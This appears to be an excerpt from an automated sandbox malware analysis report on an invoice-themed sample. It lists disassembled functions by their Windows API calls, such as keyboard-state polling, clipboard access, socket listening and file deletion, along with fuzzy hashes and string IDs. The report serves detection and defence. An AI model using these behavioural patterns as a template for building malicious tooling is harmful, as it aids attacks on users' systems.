                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: _memset
                                                              • String ID: Q\E$[$[:<:]]$[:>:]]$\$\$\$\b(?<=\w)$\b(?=\w)$]$^
                                                              • API String ID: 2102423945-2023335898
                                                              • Opcode ID: 09a01e955ba040c71d6415c44900ab7148da7a5bcd2110b53f2ae7e8512ca5f2
                                                              • Instruction ID: 1fc7544c59b06facea31bec0d335fd490d6898c61cd4955e08fc5aa6db054ab2
                                                              • Opcode Fuzzy Hash: 09a01e955ba040c71d6415c44900ab7148da7a5bcd2110b53f2ae7e8512ca5f2
                                                              • Instruction Fuzzy Hash: 8A82C271D1421ACBCF28CF98C9807BDBBB1BF48314F25816AD919AB391E7709D95CB90
                                                              APIs
                                                              • GetLocalTime.KERNEL32(?), ref: 002409DF
                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 002409EF
                                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 002409FB
                                                              • __wsplitpath.LIBCMT ref: 00240A59
                                                              • _wcscat.LIBCMT ref: 00240A71
                                                              • _wcscat.LIBCMT ref: 00240A83
                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00240A98
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00240AAC
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00240ADE
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00240AFF
                                                              • _wcscpy.LIBCMT ref: 00240B0B
                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00240B4A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                              • String ID: *.*
                                                              • API String ID: 3566783562-438819550
                                                              • Opcode ID: 86d33da3d444ea278cc051cf2fe5bc6275e7ca8bd49fefd58e41cc8f9bcbbe8d
                                                              • Instruction ID: 02a34cf77fcd3018a8658453fe5a402764752ae5483708ffe38479254f954d90
                                                              • Opcode Fuzzy Hash: 86d33da3d444ea278cc051cf2fe5bc6275e7ca8bd49fefd58e41cc8f9bcbbe8d
                                                              • Instruction Fuzzy Hash: 8A618BB21143059FD714EF60C8859AEB3E8FF99314F04891AFA89C7252DB31E995CF92
                                                              APIs
                                                                • Part of subcall function 0022ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0022ABD7
                                                                • Part of subcall function 0022ABBB: GetLastError.KERNEL32(?,0022A69F,?,?,?), ref: 0022ABE1
                                                                • Part of subcall function 0022ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0022A69F,?,?,?), ref: 0022ABF0
                                                                • Part of subcall function 0022ABBB: HeapAlloc.KERNEL32(00000000,?,0022A69F,?,?,?), ref: 0022ABF7
                                                                • Part of subcall function 0022ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0022AC0E
                                                                • Part of subcall function 0022AC56: GetProcessHeap.KERNEL32(00000008,0022A6B5,00000000,00000000,?,0022A6B5,?), ref: 0022AC62
                                                                • Part of subcall function 0022AC56: HeapAlloc.KERNEL32(00000000,?,0022A6B5,?), ref: 0022AC69
                                                                • Part of subcall function 0022AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0022A6B5,?), ref: 0022AC7A
                                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0022A6D0
                                                              • _memset.LIBCMT ref: 0022A6E5
                                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0022A704
                                                              • GetLengthSid.ADVAPI32(?), ref: 0022A715
                                                              • GetAce.ADVAPI32(?,00000000,?), ref: 0022A752
                                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0022A76E
                                                              • GetLengthSid.ADVAPI32(?), ref: 0022A78B
                                                              • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0022A79A
                                                              • HeapAlloc.KERNEL32(00000000), ref: 0022A7A1
                                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0022A7C2
                                                              • CopySid.ADVAPI32(00000000), ref: 0022A7C9
                                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0022A7FA
                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0022A820
                                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0022A834
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                              • String ID:
                                                              • API String ID: 3996160137-0
                                                              • Opcode ID: be460a29100b4ff9cabb67a012d96365882934e9981065ba824c4a8037a429e4
                                                              • Instruction ID: 06d03044ae3f06f8dc02d08cfc6f654a5baa711b090787eaa026f7ac50e290b5
                                                              • Opcode Fuzzy Hash: be460a29100b4ff9cabb67a012d96365882934e9981065ba824c4a8037a429e4
                                                              • Instruction Fuzzy Hash: AC51497191021ABFDF009FA4EC49EEEBBB9FF04300F048129F915A6690DB349A56CB61
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: )$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$))) )
                                                              • API String ID: 0-83473947
                                                              • Opcode ID: aa3d7c42e348636e235e587fa45ff5831220b433dab30c2555223bd0f3da3995
                                                              • Instruction ID: d99921f1914f801816e32b6e71e0d3749142e849ab3f80af99c251a0ab8f501c
                                                              • Opcode Fuzzy Hash: aa3d7c42e348636e235e587fa45ff5831220b433dab30c2555223bd0f3da3995
                                                              • Instruction Fuzzy Hash: FF727F71E1421ADBDF24CF58D8807BEB7B5BF58310F14816AE909EB280DB709E95DB90
                                                              APIs
                                                                • Part of subcall function 00236EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00235FA6,?), ref: 00236ED8
                                                                • Part of subcall function 002372CB: GetFileAttributesW.KERNEL32(?,00236019), ref: 002372CC
                                                              • _wcscat.LIBCMT ref: 00236441
                                                              • __wsplitpath.LIBCMT ref: 0023645F
                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00236474
                                                              • _wcscpy.LIBCMT ref: 002364A3
                                                              • _wcscat.LIBCMT ref: 002364B8
                                                              • _wcscat.LIBCMT ref: 002364CA
                                                              • DeleteFileW.KERNEL32(?), ref: 002364DA
                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 002364EB
                                                              • FindClose.KERNEL32(00000000), ref: 00236506
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                              • String ID: \*.*$p1#v`K$v
                                                              • API String ID: 2643075503-1732502266
                                                              • Opcode ID: 64f2b47bc6b5b2fd093d75982679822690d6646cc6b5a18a492d6b8f32975186
                                                              • Instruction ID: a9f4a502e150fc00a2a7775d81884f51346505b1198d0f6ae5bc45747b4dfa70
                                                              • Opcode Fuzzy Hash: 64f2b47bc6b5b2fd093d75982679822690d6646cc6b5a18a492d6b8f32975186
                                                              • Instruction Fuzzy Hash: C431D6F24183846AC321DFA48889DDBB7ECAF56300F40492AF6D8C3141EA31D55D8BA3
                                                              APIs
                                                                • Part of subcall function 00253C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00252BB5,?,?), ref: 00253C1D
                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0025328E
                                                                • Part of subcall function 001F936C: __swprintf.LIBCMT ref: 001F93AB
                                                                • Part of subcall function 001F936C: __itow.LIBCMT ref: 001F93DF
                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0025332D
                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 002533C5
                                                              • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00253604
                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00253611
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                              • String ID:
                                                              • API String ID: 1240663315-0
                                                              • Opcode ID: d4dd52385403d8fd1fa07685e12e627565c82cf5782bd108b75c63032a3b66c9
                                                              • Instruction ID: 30676a0bd33885cc429543ad7f42221139dda510ac3ac4f65f1e213f0af1066c
                                                              • Opcode Fuzzy Hash: d4dd52385403d8fd1fa07685e12e627565c82cf5782bd108b75c63032a3b66c9
                                                              • Instruction Fuzzy Hash: B9E16B71614204AFCB14DF28C995E2ABBE8FF88750F04946DF94ADB2A1DB30ED15CB81
                                                              APIs
                                                              • GetKeyboardState.USER32(?), ref: 00232B5F
                                                              • GetAsyncKeyState.USER32(000000A0), ref: 00232BE0
                                                              • GetKeyState.USER32(000000A0), ref: 00232BFB
                                                              • GetAsyncKeyState.USER32(000000A1), ref: 00232C15
                                                              • GetKeyState.USER32(000000A1), ref: 00232C2A
                                                              • GetAsyncKeyState.USER32(00000011), ref: 00232C42
                                                              • GetKeyState.USER32(00000011), ref: 00232C54
                                                              • GetAsyncKeyState.USER32(00000012), ref: 00232C6C
                                                              • GetKeyState.USER32(00000012), ref: 00232C7E
                                                              • GetAsyncKeyState.USER32(0000005B), ref: 00232C96
                                                              • GetKeyState.USER32(0000005B), ref: 00232CA8
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: State$Async$Keyboard
                                                              • String ID:
                                                              • API String ID: 541375521-0
                                                              • Opcode ID: c2b3813d778c6ea8063334ad37c7effa0d85f80eae2dc26fa6e11e5742045a12
                                                              • Instruction ID: af810e2eb91207e42f9ae7eb4fb3249d7a77157eb63448e31724bab53a998bca
                                                              • Opcode Fuzzy Hash: c2b3813d778c6ea8063334ad37c7effa0d85f80eae2dc26fa6e11e5742045a12
                                                              • Instruction Fuzzy Hash: 7A4107B06147CBAEFF359F6488443A9FEB16F11308F04944BD5C6562C1DBA499ECC7A2
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                              • String ID:
                                                              • API String ID: 1737998785-0
                                                              • Opcode ID: 9d4b5eb93db00d9a3ccded3c4b811852dcd38b7f4fa13102a99c83c279833de0
                                                              • Instruction ID: 4b2da58f39c99c9dc8dfdc1f6341d1327bec79d3ea362582e30e24a4c074a4fe
                                                              • Opcode Fuzzy Hash: 9d4b5eb93db00d9a3ccded3c4b811852dcd38b7f4fa13102a99c83c279833de0
                                                              • Instruction Fuzzy Hash: 26219C31720610EFDB05AF64EC4DB2D77A8FF45711F14841AF90ADB2A2CB70E8A18B95
                                                              APIs
                                                                • Part of subcall function 00229ABF: CLSIDFromProgID.OLE32 ref: 00229ADC
                                                                • Part of subcall function 00229ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 00229AF7
                                                                • Part of subcall function 00229ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 00229B05
                                                                • Part of subcall function 00229ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00229B15
                                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 0024C235
                                                              • _memset.LIBCMT ref: 0024C242
                                                              • _memset.LIBCMT ref: 0024C360
                                                              • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 0024C38C
                                                              • CoTaskMemFree.OLE32(?), ref: 0024C397
                                                              Strings
                                                              • NULL Pointer assignment, xrefs: 0024C3E5
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                              • String ID: NULL Pointer assignment
                                                              • API String ID: 1300414916-2785691316
                                                              • Opcode ID: 788e5ea7e8347ef5e892ab78ffc3db8c580b72aace2a53cf4f5ff2302883138a
                                                              • Instruction ID: dabd2948e482b8a6c8fbb6cb2f412c888096fd99bb2f0fa3d2729b4e776f85c2
                                                              • Opcode Fuzzy Hash: 788e5ea7e8347ef5e892ab78ffc3db8c580b72aace2a53cf4f5ff2302883138a
                                                              • Instruction Fuzzy Hash: 91916D71D11218EBDB14DF94DC85EEEBBB9EF04310F20816AF919A7281DB705A55CFA0
                                                              APIs
                                                                • Part of subcall function 0022B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0022B180
                                                                • Part of subcall function 0022B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0022B1AD
                                                                • Part of subcall function 0022B134: GetLastError.KERNEL32 ref: 0022B1BA
                                                              • ExitWindowsEx.USER32(?,00000000), ref: 00237A0F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                              • String ID: $@$SeShutdownPrivilege
                                                              • API String ID: 2234035333-194228
                                                              • Opcode ID: 2472affa75e6f83909ed4f1dd3243fed54588d054b5d6962186e522a1b43d51e
                                                              • Instruction ID: c5b3cdb82b7322ac4fae2b277a26aba83f5e0dce32f4e40e9e8b21a29cb6f233
                                                              • Opcode Fuzzy Hash: 2472affa75e6f83909ed4f1dd3243fed54588d054b5d6962186e522a1b43d51e
                                                              • Instruction Fuzzy Hash: 0C01A7F17782226FFF385A649C9BBBF72689B00741F240524FD43A21D2E9A19E2181B0
                                                              APIs
                                                              • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00248CA8
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00248CB7
                                                              • bind.WSOCK32(00000000,?,00000010), ref: 00248CD3
                                                              • listen.WSOCK32(00000000,00000005), ref: 00248CE2
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00248CFC
                                                              • closesocket.WSOCK32(00000000,00000000), ref: 00248D10
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$bindclosesocketlistensocket
                                                              • String ID:
                                                              • API String ID: 1279440585-0
                                                              • Opcode ID: 86680ee6aecfdc4c288aa6daba1a08cd7ad490cb60f04adb27bcb42b647613d3
                                                              • Instruction ID: 6b140ab9ec603bd98b7e7c40ed36450bbaf68b856fffd274a25010ff95eaf676
                                                              • Opcode Fuzzy Hash: 86680ee6aecfdc4c288aa6daba1a08cd7ad490cb60f04adb27bcb42b647613d3
                                                              • Instruction Fuzzy Hash: 0E21D0316102019FCB18EF28DC89B7EB7B9FF48710F10815AF916AB2D2CB70AD428B51
                                                              APIs
                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00236554
                                                              • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00236564
                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 00236583
                                                              • __wsplitpath.LIBCMT ref: 002365A7
                                                              • _wcscat.LIBCMT ref: 002365BA
                                                              • CloseHandle.KERNEL32(00000000,?,00000000), ref: 002365F9
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                              • String ID:
                                                              • API String ID: 1605983538-0
                                                              • Opcode ID: 9ed09bc115877ece2cacc33cca9b4a9a0d48c28023eb0ecea43d6fd0f2745358
                                                              • Instruction ID: 1fb360cfd94c0b0dfd3add8ef2ee1461d834d5d2ef4de4504642750eda2af1e1
                                                              • Opcode Fuzzy Hash: 9ed09bc115877ece2cacc33cca9b4a9a0d48c28023eb0ecea43d6fd0f2745358
                                                              • Instruction Fuzzy Hash: 722141B1910219ABDB20AFA4DC89BD9B7BCAB54300F9044A5E509E7141DBB19B95CF60
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ERCP$VUUU$VUUU$VUUU$VUUU$)
                                                              • API String ID: 0-3714085877
                                                              • Opcode ID: 5619f3db63501fcc88c5dc097ff60d952722404df5bef4b6e5a275c54d79cbe9
                                                              • Instruction ID: f4eb8105e703c2fa9816024bd77a37115c8daff87e041ecb0f0fa617ae2093ac
                                                              • Opcode Fuzzy Hash: 5619f3db63501fcc88c5dc097ff60d952722404df5bef4b6e5a275c54d79cbe9
                                                              • Instruction Fuzzy Hash: AC92C071E0021ACBDF28DF68C8507BDB7B1BF54310F6581AAE91AAB280D7749D91CF91
                                                              APIs
                                                              • lstrlenW.KERNEL32(?,?,?,00000000), ref: 002313DC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                               • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: lstrlen
                                                              • String ID: ($,2*$<2*$|
                                                              • API String ID: 1659193697-3871408827
                                                              • Opcode ID: 60f34117507d8837ecca7f5b9706e493357a500f3c0d18117e56467eb32dd608
                                                              • Instruction ID: f413be53c25e9286b60540a24cfcbf98ec1786a803ee62e50fb2a41a571108e2
                                                              • Opcode Fuzzy Hash: 60f34117507d8837ecca7f5b9706e493357a500f3c0d18117e56467eb32dd608
                                                              • Instruction Fuzzy Hash: 173214B5A107059FC728CF69C480A6AB7F0FF48310B15C56EE59ADB3A2E770E961CB44
                                                              APIs
                                                                • Part of subcall function 0024A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0024A84E
                                                              • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00249296
                                                              • WSAGetLastError.WSOCK32(00000000,00000000), ref: 002492B9
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                               • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastinet_addrsocket
                                                              • String ID:
                                                              • API String ID: 4170576061-0
                                                              • Opcode ID: 44e9d793c6c38a3198ffa8991c735b02f9e1f96685c9c480af6d651bc733e8ed
                                                              • Instruction ID: 8aa68dae6e375c4eac4f83b8a2cb99b6a9af1b7736f73f1abc9020e2ff976192
                                                              • Opcode Fuzzy Hash: 44e9d793c6c38a3198ffa8991c735b02f9e1f96685c9c480af6d651bc733e8ed
                                                              • Instruction Fuzzy Hash: 5141CE70610204AFEB14BF28C886E7EB7EDEF44724F148549F956AB2C2CBB49D518B91
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(?,?), ref: 0023EB8A
                                                              • _wcscmp.LIBCMT ref: 0023EBBA
                                                              • _wcscmp.LIBCMT ref: 0023EBCF
